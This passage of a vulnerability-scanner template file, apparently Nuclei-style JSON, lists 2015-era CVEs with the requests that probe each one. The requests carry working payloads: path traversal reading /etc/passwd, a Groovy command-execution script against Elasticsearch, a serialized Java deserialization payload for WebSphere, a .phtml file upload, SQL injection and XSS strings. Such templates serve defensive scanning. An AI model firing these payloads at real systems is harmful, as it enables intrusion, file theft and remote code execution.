Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site 